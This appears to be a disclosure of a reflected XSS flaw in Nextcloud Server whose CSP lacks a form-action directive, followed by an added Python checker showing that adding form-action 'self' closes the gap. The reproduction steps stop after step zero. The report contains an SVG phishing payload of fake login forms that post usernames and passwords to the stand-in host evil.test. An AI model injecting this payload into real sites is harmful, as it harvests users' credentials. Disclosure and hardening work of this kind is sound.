I just found a reflected Cross-Site Scripting (XSS) vulnerability in Nextcloud Server that affects current stable and dates back to at least 15.0.5.
The vulnerability seems mitigated by a Content-Security-Policy (CSP), but there might be a residual risk for phishing, due to the CSP’s lack of a form-action directive.
Steps to repeat (for basic XSS):
0) Replace server.test in the following URLs with your own test instance of Nextcloud.
Steps to repeat (for phishing):
0) Replace server.test in the following URLs with your own test instance of Nextcloud.
<svg width="256" height="128" version="1.1" viewBox="0 0 256 128" xmlns="http://www.w3.org/2000/svg">
  <g fill="none" stroke-width="22">
    <circle cx="40" cy="64" r="26" stroke="#fff"/>
    <foreignObject class="node" x="0" y="0" width="600" height="600">
      <div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div>
    </foreignObject>
    <circle alt="" fill="none"/>
    <circle cx="216" cy="64" r="26" stroke="#fff"/>
    <foreignObject class="node" x="0" y="0" width="600" height="600">
      <div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div>
    </foreignObject>
    <circle alt="" fill="none"/>
    <circle cx="128" cy="64" r="46" stroke="#fff"/>
    <foreignObject class="node" x="0" y="0" width="600" height="600">
      <div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div>
    </foreignObject>
    <circle alt="" fill="none"/>
  </g>
</svg>
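To make the form-action point from the report concrete, here is an added checker that is not part of the report and not Nextcloud code: it parses a CSP header and decides whether an injected form may post to another origin. The header strings, page URL and form target are constructed for the example; the real Nextcloud policy is not reproduced.

```python
"""Added example: does a CSP stop an injected <form> from posting cross-origin?
Header strings and URLs below are constructed for illustration."""
from urllib.parse import urlsplit

def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [source expressions]}.
    Per the spec, a repeated directive is ignored: the first occurrence wins."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def source_matches(expr: str, target: str, page: str) -> bool:
    """Does one source expression allow a request to `target` from `page`?
    Handles 'none', 'self', '*', scheme sources (https:) and host sources
    with an optional scheme and *. prefix. Simplification: a host source that
    names a scheme must match the target scheme exactly."""
    t, p = urlsplit(target), urlsplit(page)
    e = expr.strip("'").lower()
    if e == "none":
        return False
    if e == "self":
        return (t.scheme, t.netloc) == (p.scheme, p.netloc)
    if e == "*":
        return t.scheme in ("http", "https")
    if e.endswith(":"):                       # scheme source, e.g. "https:"
        return t.scheme == e[:-1]
    host = urlsplit(e if "://" in e else f"{t.scheme}://{e}")
    if host.scheme != t.scheme or not host.hostname:
        return False
    if host.hostname.startswith("*."):
        return bool(t.hostname) and t.hostname.endswith(host.hostname[1:])
    return t.hostname == host.hostname

def form_post_allowed(header: str, target: str, page: str) -> bool:
    """form-action does NOT fall back to default-src: when the directive is
    absent, a form may submit anywhere, which is the phishing risk above."""
    sources = parse_csp(header).get("form-action")
    if sources is None:
        return True
    return any(source_matches(s, target, page) for s in sources)

PAGE = "https://server.test/"                      # constructed test instance
PHISH = "https://evil.test/collect"                # where action="//evil.test" resolves
WEAK_CSP = "default-src 'self'; script-src 'self'; img-src 'self' data:"  # no form-action
FIXED_CSP = WEAK_CSP + "; form-action 'self'"     # hardened: forms may only post to self
```

With WEAK_CSP the injected form is allowed to post to evil.test even though every script source is blocked; adding form-action 'self' closes that gap without loosening anything else.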